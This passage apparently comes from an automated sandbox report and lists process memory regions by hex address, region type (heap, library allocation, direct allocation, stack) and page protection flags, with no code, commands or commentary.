page read and write
243684AC000
trusted library allocation
page read and write
2435B76D000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2435E4BD000
trusted library allocation
page read and write
37B0000
heap
page read and write
2435C7A6000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
24368188000
trusted library allocation
page read and write
2435C8BB000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
2435DFC8000
trusted library allocation
page read and write
2435DB8B000
trusted library allocation
page read and write
24363475000
trusted library allocation
page read and write
ED03FFA000
stack
page read and write
2435C896000
trusted library allocation
page read and write
2435CF00000
trusted library allocation
page read and write
2435CA02000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24368375000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
243654E2000
trusted library allocation
page read and write
1F52793C000
trusted library allocation
page read and write
24369364000
trusted library allocation
page read and write
243658DE000
trusted library allocation
page read and write
2435B4E6000
trusted library allocation
page read and write
21CE000
heap
page read and write
2435EF84000
trusted library allocation
page read and write
2435C8BF000
trusted library allocation
page read and write
2410000
heap
page read and write
184C726A000
trusted library allocation
page read and write
24368196000
trusted library allocation
page read and write
24357C76000
trusted library allocation
page read and write
24358F69000
trusted library allocation
page read and write
39E0000
direct allocation
page read and write
2435EDC5000
trusted library allocation
page read and write
24368352000
trusted library allocation
page read and write
1F527590000
unclassified section
page readonly
2435B4B8000
trusted library allocation
page read and write
B655000
heap
page read and write
2435B4E9000
trusted library allocation
page read and write
24363879000
trusted library allocation
page read and write
2FCE000
stack
page read and write
2434DA7E000
heap
page read and write
3090000
heap
page read and write
2435E265000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2434DADE000
heap
page read and write
25EFE707000
trusted library allocation
page read and write
2435C0E5000
trusted library allocation
page read and write
2435C0A8000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
24358F90000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435BA74000
trusted library allocation
page read and write
21C7000
heap
page read and write
2434DAE1000
heap
page read and write
184C7913000
trusted library allocation
page read and write
243680CF000
trusted library allocation
page read and write
2435E287000
trusted library allocation
page read and write
1C0B000
heap
page read and write
24357D13000
trusted library allocation
page read and write
24363428000
trusted library allocation
page read and write
243658AC000
trusted library allocation
page read and write
24363830000
trusted library allocation
page read and write
24364D09000
trusted library allocation
page read and write
386E000
heap
page read and write
2435DF4C000
trusted library allocation
page read and write
243655B1000
trusted library allocation
page read and write
243577B6000
heap
page read and write
2434DA90000
heap
page read and write
184C7ED8000
heap
page read and write
2435EF91000
trusted library allocation
page read and write
2435B750000
trusted library allocation
page read and write
2435EFC7000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
243680E2000
trusted library allocation
page read and write
2435C8F4000
trusted library allocation
page read and write
243654C6000
trusted library allocation
page read and write
2435C7C3000
trusted library allocation
page read and write
38C0000
direct allocation
page read and write
B910000
direct allocation
page read and write
2435B4C7000
trusted library allocation
page read and write
2435E4E2000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2434DAD6000
heap
page read and write
243680CC000
trusted library allocation
page read and write
24357DD9000
trusted library allocation
page read and write
2435EF73000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24368378000
trusted library allocation
page read and write
D41000
unkown
page execute read
184C77C2000
heap
page read and write
249E000
heap
page read and write
2434DAE1000
heap
page read and write
3B50000
direct allocation
page read and write
2AF7000
heap
page read and write
2435B86A000
trusted library allocation
page read and write
2435C0EB000
trusted library allocation
page read and write
2435C8E0000
trusted library allocation
page read and write
3BE0000
direct allocation
page read and write
2435ED96000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
1CBC000
heap
page read and write
2434DA90000
heap
page read and write
77A000
heap
page read and write
2435E2F7000
trusted library allocation
page read and write
2435DEE9000
trusted library allocation
page read and write
3D40000
direct allocation
page read and write
2436338A000
trusted library allocation
page read and write
243653E3000
trusted library allocation
page read and write
2435B660000
trusted library allocation
page read and write
2434DADE000
heap
page read and write
11A6000
unkown
page readonly
2435EFF2000
trusted library allocation
page read and write
24368958000
trusted library allocation
page read and write
24357498000
trusted library allocation
page read and write
2A67000
heap
page read and write
2436374B000
trusted library allocation
page read and write
2435EF25000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2435B649000
trusted library allocation
page read and write
2435C0F2000
trusted library allocation
page read and write
243638F4000
trusted library allocation
page read and write
2435DAE2000
trusted library allocation
page read and write
39D0000
direct allocation
page read and write
2435B8E6000
trusted library allocation
page read and write
24357DB0000
trusted library allocation
page read and write
31A0000
heap
page read and write
2435C7C3000
trusted library allocation
page read and write
2435EF73000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435C896000
trusted library allocation
page read and write
2435EDA8000
trusted library allocation
page read and write
2435DF62000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435B8AE000
trusted library allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2435BAFC000
trusted library allocation
page read and write
2435E278000
trusted library allocation
page read and write
2435EFA8000
trusted library allocation
page read and write
24365449000
trusted library allocation
page read and write
2435B8C1000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435EF35000
trusted library allocation
page read and write
326E000
heap
page read and write
2435BAF3000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
243684ED000
trusted library allocation
page read and write
2435E14E000
trusted library allocation
page read and write
3D30000
direct allocation
page read and write
3D20000
direct allocation
page read and write
2435C896000
trusted library allocation
page read and write
184C72EB000
trusted library allocation
page read and write
2435C749000
trusted library allocation
page read and write
2435E057000
trusted library allocation
page read and write
25EFE582000
trusted library allocation
page read and write
2435DFA5000
trusted library allocation
page read and write
2435E18F000
trusted library allocation
page read and write
2435C0FE000
trusted library allocation
page read and write
2435DEB8000
trusted library allocation
page read and write
243684CF000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
24365361000
trusted library allocation
page read and write
184C7E41000
heap
page read and write
25EFE530000
trusted library allocation
page read and write
383B000
heap
page read and write
243577D3000
heap
page read and write
2435B4C7000
trusted library allocation
page read and write
243638D0000
trusted library allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
2435EFAE000
trusted library allocation
page read and write
184C7EC8000
heap
page read and write
2435E1DD000
trusted library allocation
page read and write
2436939F000
trusted library allocation
page read and write
24368ACD000
trusted library allocation
page read and write
24358FFB000
trusted library allocation
page read and write
243593B2000
trusted library allocation
page read and write
2435E246000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
243680FA000
trusted library allocation
page read and write
184C7289000
trusted library allocation
page read and write
2435E2E9000
trusted library allocation
page read and write
2436569D000
trusted library allocation
page read and write
2435E1C3000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435E09F000
trusted library allocation
page read and write
3870000
direct allocation
page read and write
2435BAF0000
trusted library allocation
page read and write
B9FD43E000
stack
page read and write
2435EDCC000
trusted library allocation
page read and write
243658E5000
trusted library allocation
page read and write
2435E28B000
trusted library allocation
page read and write
4D18000
heap
page read and write
2435EFEE000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
3360000
direct allocation
page read and write
243577D3000
heap
page read and write
37FD000
heap
page read and write
2435BA70000
trusted library allocation
page read and write
2435E1DE000
trusted library allocation
page read and write
2435B4CC000
trusted library allocation
page read and write
31AA000
heap
page read and write
386E000
heap
page read and write
2435DF7E000
trusted library allocation
page read and write
21CE000
heap
page read and write
24365898000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
2435E143000
trusted library allocation
page read and write
2435C74B000
trusted library allocation
page read and write
2435E03B000
trusted library allocation
page read and write
24368196000
trusted library allocation
page read and write
2435BA58000
trusted library allocation
page read and write
2436528A000
trusted library allocation
page read and write
24368ACD000
trusted library allocation
page read and write
25EFE56B000
trusted library allocation
page read and write
24363388000
trusted library allocation
page read and write
2434DAC6000
heap
page read and write
2435E2F9000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435E164000
trusted library allocation
page read and write
2436580D000
trusted library allocation
page read and write
B600000
heap
page read and write
2435C0D9000
trusted library allocation
page read and write
2435DF36000
trusted library allocation
page read and write
295A9A82000
heap
page read and write
243658F8000
trusted library allocation
page read and write
243637D2000
trusted library allocation
page read and write
2435DF7E000
trusted library allocation
page read and write
2436848E000
trusted library allocation
page read and write
2435B6F0000
trusted library allocation
page read and write
243689C2000
trusted library allocation
page read and write
243684C4000
trusted library allocation
page read and write
2435EF73000
trusted library allocation
page read and write
2435D07E000
trusted library allocation
page read and write
2435C0A8000
trusted library allocation
page read and write
2435D03C000
trusted library allocation
page read and write
2436389F000
trusted library allocation
page read and write
2434D05B000
heap
page read and write
1E8C1400000
heap
page read and write
321A000
heap
page read and write
2435E0ED000
trusted library allocation
page read and write
243654A0000
trusted library allocation
page read and write
2435BA65000
trusted library allocation
page read and write
2435C0DD000
trusted library allocation
page read and write
24357490000
trusted library allocation
page read and write
1F527932000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435E11B000
trusted library allocation
page read and write
3270000
direct allocation
page read and write
2435C0AA000
trusted library allocation
page read and write
24368988000
trusted library allocation
page read and write
2435BA5A000
trusted library allocation
page read and write
2435EFA0000
trusted library allocation
page read and write
2CEE000
stack
page read and write
243577C5000
heap
page read and write
2434DAB6000
heap
page read and write
24357DA0000
trusted library allocation
page read and write
2435DF56000
trusted library allocation
page read and write
243683E4000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2435E11D000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2435DF27000
trusted library allocation
page read and write
1299000
unkown
page readonly
184C7D4E000
unkown
page execute read
2434DA7E000
heap
page read and write
2435C8F4000
trusted library allocation
page read and write
2435DFDD000
trusted library allocation
page read and write
2A53000
heap
page read and write
243681FC000
trusted library allocation
page read and write
243652EF000
trusted library allocation
page read and write
2435DF14000
trusted library allocation
page read and write
2435C72D000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2435BAC5000
trusted library allocation
page read and write
243658F8000
trusted library allocation
page read and write
24368988000
trusted library allocation
page read and write
2435BA74000
trusted library allocation
page read and write
4C1F000
stack
page read and write
2414000
heap
page read and write
2435B6DC000
trusted library allocation
page read and write
243680E5000
trusted library allocation
page read and write
2435EDA8000
trusted library allocation
page read and write
2435CC2D000
trusted library allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
24369369000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
2435E1CF000
trusted library allocation
page read and write
46835BE000
unkown
page readonly
2BB2000
heap
page read and write
243577D3000
heap
page read and write
243650AD000
trusted library allocation
page read and write
184C7EAB000
heap
page read and write
2434DA93000
heap
page read and write
2434DAB0000
heap
page read and write
243633B2000
trusted library allocation
page read and write
2435B49F000
trusted library allocation
page read and write
2435DF9D000
trusted library allocation
page read and write
57E000
stack
page read and write
1F52777D000
trusted library allocation
page read and write
2435E1EE000
trusted library allocation
page read and write
2435E1DD000
trusted library allocation
page read and write
2435E48C000
trusted library allocation
page read and write
2435E11F000
trusted library allocation
page read and write
243658C1000
trusted library allocation
page read and write
2435BA4D000
trusted library allocation
page read and write
2435DDBA000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
184C6F20000
heap
page read and write
2435C0EB000
trusted library allocation
page read and write
243577AA000
heap
page read and write
2435DEBF000
trusted library allocation
page read and write
2435DDDB000
trusted library allocation
page read and write
2ADB000
heap
page read and write
243577D3000
heap
page read and write
2434DA7E000
heap
page read and write
243680E9000
trusted library allocation
page read and write
3B60000
direct allocation
page read and write
2434DA93000
heap
page read and write
2435B4E6000
trusted library allocation
page read and write
24357C71000
trusted library allocation
page read and write
2435EF27000
trusted library allocation
page read and write
24369651000
heap
page read and write
34B0000
direct allocation
page read and write
24358F64000
trusted library allocation
page read and write
1F527370000
unclassified section
page readonly
2435E137000
trusted library allocation
page read and write
2435B4A0000
trusted library allocation
page read and write
2436371C000
trusted library allocation
page read and write
2435B4E6000
trusted library allocation
page read and write
B655000
heap
page read and write
2435BAEC000
trusted library allocation
page read and write
243658DE000
trusted library allocation
page read and write
3290000
direct allocation
page read and write
2435DF44000
trusted library allocation
page read and write
2435EFA5000
trusted library allocation
page read and write
25EFE570000
trusted library allocation
page read and write
2435CD1B000
trusted library allocation
page read and write
243683CC000
trusted library allocation
page read and write
2435C8C2000
trusted library allocation
page read and write
24357C71000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435E20D000
trusted library allocation
page read and write
2435E2E7000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
24368361000
trusted library allocation
page read and write
2B20000
heap
page read and write
2434DA7D000
heap
page read and write
2434DAB0000
heap
page read and write
243658EE000
trusted library allocation
page read and write
184C7DB3000
heap
page read and write
243574F9000
trusted library allocation
page read and write
24357DD9000
trusted library allocation
page read and write
2B1E000
heap
page read and write
2434DA9B000
heap
page read and write
2434DABC000
heap
page read and write
3850000
direct allocation
page read and write
2435DFA5000
trusted library allocation
page read and write
2435C179000
trusted library allocation
page read and write
243638AA000
trusted library allocation
page read and write
2435DF34000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435DF7C000
trusted library allocation
page read and write
2435E06F000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
2435C8B8000
trusted library allocation
page read and write
243637D3000
trusted library allocation
page read and write
2435B8D2000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
1F52790F000
trusted library allocation
page read and write
2436848A000
trusted library allocation
page read and write
2435E1C3000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
2BB2000
heap
page read and write
400000
unkown
page readonly
24359308000
trusted library allocation
page read and write
1F527766000
trusted library allocation
page read and write
2A51000
heap
page read and write
24365817000
trusted library allocation
page read and write
2435B4B8000
trusted library allocation
page read and write
2435E267000
trusted library allocation
page read and write
4D11000
heap
page read and write
2436534D000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
24358F0C000
trusted library allocation
page read and write
2435DD8E000
trusted library allocation
page read and write
2435B8C1000
trusted library allocation
page read and write
243638CD000
trusted library allocation
page read and write
B43E000
heap
page read and write
39C0000
direct allocation
page read and write
184C7EC8000
heap
page read and write
2435DF73000
trusted library allocation
page read and write
2A66000
heap
page read and write
3099000
heap
page read and write
184C7E38000
heap
page read and write
2435D0AB000
trusted library allocation
page read and write
1B5F000
stack
page read and write
36A0000
direct allocation
page read and write
2435EE99000
trusted library allocation
page read and write
2435E1DD000
trusted library allocation
page read and write
2435C0AE000
trusted library allocation
page read and write
2435DF3A000
trusted library allocation
page read and write
243577CA000
heap
page read and write
468253E000
unkown
page readonly
3096000
heap
page read and write
243638EE000
trusted library allocation
page read and write
24369338000
trusted library allocation
page read and write
243683AE000
trusted library allocation
page read and write
37D0000
direct allocation
page read and write
2434DA93000
heap
page read and write
2435E0CB000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2434DAE4000
heap
page read and write
FF0000
heap
page read and write
2435C0EE000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
24358F34000
trusted library allocation
page read and write
2435C9F5000
trusted library allocation
page read and write
2D30000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
25EFE577000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
2435DD44000
trusted library allocation
page read and write
2436831F000
trusted library allocation
page read and write
2435DF62000
trusted library allocation
page read and write
243633AA000
trusted library allocation
page read and write
2B17000
heap
page read and write
24357DFE000
trusted library allocation
page read and write
2435EF95000
trusted library allocation
page read and write
1F52791E000
trusted library allocation
page read and write
243633F9000
trusted library allocation
page read and write
243656CC000
trusted library allocation
page read and write
2435BA13000
trusted library allocation
page read and write
2434DAD8000
heap
page read and write
243633C2000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
ED03FFF000
stack
page read and write
243658FB000
trusted library allocation
page read and write
2435E48B000
trusted library allocation
page read and write
243653D8000
trusted library allocation
page read and write
2435EED2000
trusted library allocation
page read and write
24363892000
trusted library allocation
page read and write
24368132000
trusted library allocation
page read and write
2436372A000
trusted library allocation
page read and write
2435DF07000
trusted library allocation
page read and write
2435E2E7000
trusted library allocation
page read and write
243689EE000
trusted library allocation
page read and write
25EFE400000
trusted library allocation
page read and write
2435CC64000
trusted library allocation
page read and write
34E0000
direct allocation
page read and write
2435EE8C000
trusted library allocation
page read and write
24357DBF000
trusted library allocation
page read and write
243633AA000
trusted library allocation
page read and write
243684DB000
trusted library allocation
page read and write
243577B4000
heap
page read and write
2435E26D000
trusted library allocation
page read and write
243658C1000
trusted library allocation
page read and write
2435C099000
trusted library allocation
page read and write
184C7ED8000
heap
page read and write
243652EB000
trusted library allocation
page read and write
8B2CBFF000
stack
page read and write
24358F63000
trusted library allocation
page read and write
2515000
heap
page read and write
2435E256000
trusted library allocation
page read and write
2435B4CD000
trusted library allocation
page read and write
300F000
stack
page read and write
403000
unkown
page execute read
2434DA84000
heap
page read and write
2435930A000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
2435EFA0000
trusted library allocation
page read and write
2435E15F000
trusted library allocation
page read and write
2435B736000
trusted library allocation
page read and write
2435B8F6000
trusted library allocation
page read and write
2BB2000
heap
page read and write
25EFE5DB000
trusted library allocation
page read and write
B450000
heap
page read and write
2434DABC000
heap
page read and write
2435BA23000
trusted library allocation
page read and write
2435B8E8000
trusted library allocation
page read and write
2435B6B0000
trusted library allocation
page read and write
2435EF5C000
trusted library allocation
page read and write
2435DDC3000
trusted library allocation
page read and write
24365898000
trusted library allocation
page read and write
2435E2ED000
trusted library allocation
page read and write
184C7EC8000
heap
page read and write
243681DE000
trusted library allocation
page read and write
2435DF7A000
trusted library allocation
page read and write
24357D82000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DA90000
heap
page read and write
BDA0000
direct allocation
page read and write
2435E455000
trusted library allocation
page read and write
184C7248000
trusted library allocation
page read and write
2435DAB7000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435DF57000
trusted library allocation
page read and write
2435DEE9000
trusted library allocation
page read and write
2435E2F3000
trusted library allocation
page read and write
2435B8E6000
trusted library allocation
page read and write
2BB2000
heap
page read and write
3890000
direct allocation
page read and write
243680CF000
trusted library allocation
page read and write
468363E000
unkown
page readonly
2435EF78000
trusted library allocation
page read and write
60A751D000
stack
page read and write
2435DFF4000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
27F0000
heap
page read and write
2435B7A1000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435C8A3000
trusted library allocation
page read and write
2435B4AE000
trusted library allocation
page read and write
2435EDDC000
trusted library allocation
page read and write
243650D4000
trusted library allocation
page read and write
2435DC8B000
trusted library allocation
page read and write
2435EFA8000
trusted library allocation
page read and write
2435D49D000
trusted library allocation
page read and write
243653DD000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
B6E8000
heap
page read and write
2434DAC7000
heap
page read and write
184C7E33000
heap
page read and write
24358FB3000
trusted library allocation
page read and write
2435C07B000
trusted library allocation
page read and write
2435DFB3000
trusted library allocation
page read and write
2435BA5C000
trusted library allocation
page read and write
2435DF0D000
trusted library allocation
page read and write
2B00000
heap
page read and write
2436849E000
trusted library allocation
page read and write
2435B476000
trusted library allocation
page read and write
2435E1A8000
trusted library allocation
page read and write
243577CA000
heap
page read and write
2434DAD2000
heap
page read and write
3A50000
direct allocation
page read and write
2435E26A000
trusted library allocation
page read and write
2435C7A0000
trusted library allocation
page read and write
24363400000
trusted library allocation
page read and write
2435C729000
trusted library allocation
page read and write
2436848E000
trusted library allocation
page read and write
2435DBCA000
trusted library allocation
page read and write
2435938B000
trusted library allocation
page read and write
2435EF6C000
trusted library allocation
page read and write
2435C97F000
trusted library allocation
page read and write
24368997000
trusted library allocation
page read and write
1B62000
heap
page read and write
24358DAD000
trusted library allocation
page read and write
2435DDC2000
trusted library allocation
page read and write
2435CCA2000
trusted library allocation
page read and write
2436374A000
trusted library allocation
page read and write
323E000
heap
page read and write
24358F34000
trusted library allocation
page read and write
243680DB000
trusted library allocation
page read and write
2435DFA7000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24357CFE000
trusted library allocation
page read and write
243654C6000
trusted library allocation
page read and write
24368141000
trusted library allocation
page read and write
2435C0FA000
trusted library allocation
page read and write
2436849E000
trusted library allocation
page read and write
2435C909000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435E20D000
trusted library allocation
page read and write
1F527D40000
heap
page read and write
B655000
heap
page read and write
25EFE549000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
C51000
unkown
page execute read
2435E1A8000
trusted library allocation
page read and write
243681B7000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435CC36000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
24358F13000
trusted library allocation
page read and write
25EFE1D0000
heap
page read and write
24358F0F000
trusted library allocation
page read and write
2BB2000
heap
page read and write
B9FDC3E000
unkown
page readonly
2435C0AA000
trusted library allocation
page read and write
D40000
unkown
page readonly
2434DA8F000
heap
page read and write
2435C8EB000
trusted library allocation
page read and write
243650FA000
trusted library allocation
page read and write
2435DF55000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435E2E5000
trusted library allocation
page read and write
2434DAD1000
heap
page read and write
2435EFC7000
trusted library allocation
page read and write
24363438000
trusted library allocation
page read and write
243654D4000
trusted library allocation
page read and write
2436831D000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
2434DABC000
heap
page read and write
2435EF6C000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435DF44000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435C18C000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2435E1FE000
trusted library allocation
page read and write
2435E1D9000
trusted library allocation
page read and write
2436814A000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
243681E9000
trusted library allocation
page read and write
24363809000
trusted library allocation
page read and write
243693A2000
trusted library allocation
page read and write
2435DF4D000
trusted library allocation
page read and write
2435E1EE000
trusted library allocation
page read and write
2435E0C1000
trusted library allocation
page read and write
243683AE000
trusted library allocation
page read and write
2435EE8C000
trusted library allocation
page read and write
2435E287000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2435C7EF000
trusted library allocation
page read and write
2435CC69000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435C8FA000
trusted library allocation
page read and write
2435CD75000
trusted library allocation
page read and write
2B1D000
heap
page read and write
2435E2E5000
trusted library allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
2435EFAE000
trusted library allocation
page read and write
24357D8D000
trusted library allocation
page read and write
2435EF84000
trusted library allocation
page read and write
2435B4CD000
trusted library allocation
page read and write
184C7E70000
heap
page read and write
2435E1EA000
trusted library allocation
page read and write
241A000
heap
page read and write
2435E258000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2436372A000
trusted library allocation
page read and write
24357DFE000
trusted library allocation
page read and write
2435B8C4000
trusted library allocation
page read and write
24357CF6000
trusted library allocation
page read and write
2435B8AE000
trusted library allocation
page read and write
243680E9000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
243681EE000
trusted library allocation
page read and write
2435C749000
trusted library allocation
page read and write
243652D3000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2435BE24000
trusted library allocation
page read and write
2435B4E6000
trusted library allocation
page read and write
243680E2000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2435EFDC000
trusted library allocation
page read and write
24368009000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
2434DA7E000
heap
page read and write
2435C0AA000
trusted library allocation
page read and write
2436336A000
trusted library allocation
page read and write
2435DF8C000
trusted library allocation
page read and write
2435C896000
trusted library allocation
page read and write
2435EF35000
trusted library allocation
page read and write
295A9B80000
heap
page read and write
92F000
stack
page read and write
2434DABD000
heap
page read and write
2435DF64000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
243680F6000
trusted library allocation
page read and write
2434DAD3000
heap
page read and write
184C7916000
trusted library allocation
page read and write
30A3000
heap
page read and write
2434DA89000
heap
page read and write
295A9A20000
heap
page read and write
2460003F000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DA93000
heap
page read and write
243683B3000
trusted library allocation
page read and write
2435C0AA000
trusted library allocation
page read and write
243650DC000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435E45B000
trusted library allocation
page read and write
2435EF9C000
trusted library allocation
page read and write
243683B3000
trusted library allocation
page read and write
BAE1000
heap
page read and write
2435DD0A000
trusted library allocation
page read and write
3831000
heap
page read and write
24359385000
trusted library allocation
page read and write
2436809E000
trusted library allocation
page read and write
40F000
unkown
page readonly
2436813D000
trusted library allocation
page read and write
2435B8CB000
trusted library allocation
page read and write
2435E15A000
trusted library allocation
page read and write
2435E1DD000
trusted library allocation
page read and write
2435EF0D000
trusted library allocation
page read and write
2435E13C000
trusted library allocation
page read and write
184C7DAF000
heap
page read and write
2435BABB000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
2435E23F000
trusted library allocation
page read and write
24365669000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435C95A000
trusted library allocation
page read and write
2435D073000
trusted library allocation
page read and write
2A58000
heap
page read and write
2435B4F1000
trusted library allocation
page read and write
2435CC8B000
trusted library allocation
page read and write
2BB2000
heap
page read and write
21CE000
heap
page read and write
243658F8000
trusted library allocation
page read and write
243658D9000
trusted library allocation
page read and write
2435B4AE000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2434DA77000
heap
page read and write
2435E2F5000
trusted library allocation
page read and write
2435CC36000
trusted library allocation
page read and write
243633D5000
trusted library allocation
page read and write
243680E0000
trusted library allocation
page read and write
2435CCAB000
trusted library allocation
page read and write
243638A2000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
AD0000
heap
page read and write
2435E239000
trusted library allocation
page read and write
2435BAEC000
trusted library allocation
page read and write
243680E9000
trusted library allocation
page read and write
24368479000
trusted library allocation
page read and write
243689F8000
trusted library allocation
page read and write
3853000
heap
page read and write
2434DAE1000
heap
page read and write
30A0000
heap
page read and write
1299000
unkown
page readonly
2436523F000
trusted library allocation
page read and write
243633CE000
trusted library allocation
page read and write
2435EFF2000
trusted library allocation
page read and write
2435B76D000
trusted library allocation
page read and write
2435B87D000
trusted library allocation
page read and write
3850000
heap
page read and write
2434DAD6000
heap
page read and write
2434DA90000
heap
page read and write
184C6E80000
unclassified section
page readonly
75F000
heap
page read and write
285B000
stack
page read and write
2435DF73000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435B665000
trusted library allocation
page read and write
2435E0CB000
trusted library allocation
page read and write
24358F64000
trusted library allocation
page read and write
24369605000
heap
page read and write
2435DABE000
trusted library allocation
page read and write
9F0000
heap
page read and write
18EBA001000
trusted library allocation
page execute read
2434DABC000
heap
page read and write
2434DA76000
heap
page read and write
3920000
direct allocation
page read and write
2435E455000
trusted library allocation
page read and write
2435E1AB000
trusted library allocation
page read and write
24368AC7000
trusted library allocation
page read and write
3864000
heap
page read and write
2435DC37000
trusted library allocation
page read and write
184C7E38000
heap
page read and write
2435938F000
trusted library allocation
page read and write
2435CC56000
trusted library allocation
page read and write
243638B7000
trusted library allocation
page read and write
24365256000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
184C7E3F000
heap
page read and write
2435E14E000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
24358D7D000
trusted library allocation
page read and write
2435B874000
trusted library allocation
page read and write
243650FA000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
2435C80B000
trusted library allocation
page read and write
24363815000
trusted library allocation
page read and write
119F000
unkown
page write copy
2434DA9B000
heap
page read and write
60A759E000
stack
page read and write
24369314000
trusted library allocation
page read and write
2434DADC000
heap
page read and write
2BB2000
heap
page read and write
2434DAC8000
heap
page read and write
2435C8C0000
trusted library allocation
page read and write
25EFE55D000
trusted library allocation
page read and write
3232000
heap
page read and write
2436524B000
trusted library allocation
page read and write
2435DF69000
trusted library allocation
page read and write
B656000
heap
page read and write
2435E2DF000
trusted library allocation
page read and write
2435CD35000
trusted library allocation
page read and write
510000
heap
page read and write
2434DA7D000
heap
page read and write
2434DAD1000
heap
page read and write
2435E14E000
trusted library allocation
page read and write
2435E1EA000
trusted library allocation
page read and write
24365865000
trusted library allocation
page read and write
C94000
unkown
page read and write
2435EFF2000
trusted library allocation
page read and write
2435E193000
trusted library allocation
page read and write
2B17000
heap
page read and write
243638F1000
trusted library allocation
page read and write
2435DD13000
trusted library allocation
page read and write
24368356000
trusted library allocation
page read and write
24358DC6000
trusted library allocation
page read and write
2435B4A7000
trusted library allocation
page read and write
243638AA000
trusted library allocation
page read and write
24368976000
trusted library allocation
page read and write
243656C0000
trusted library allocation
page read and write
24358DA8000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
2435E2F7000
trusted library allocation
page read and write
24365595000
trusted library allocation
page read and write
2435C725000
trusted library allocation
page read and write
24357C2F000
trusted library allocation
page read and write
2435E086000
trusted library allocation
page read and write
2435D037000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
2435EDFA000
trusted library allocation
page read and write
243683CC000
trusted library allocation
page read and write
2435C066000
trusted library allocation
page read and write
24363392000
trusted library allocation
page read and write
2B40000
direct allocation
page read and write
763000
heap
page read and write
1B6C000
heap
page read and write
243680F8000
trusted library allocation
page read and write
2435C749000
trusted library allocation
page read and write
243680E6000
trusted library allocation
page read and write
2435E265000
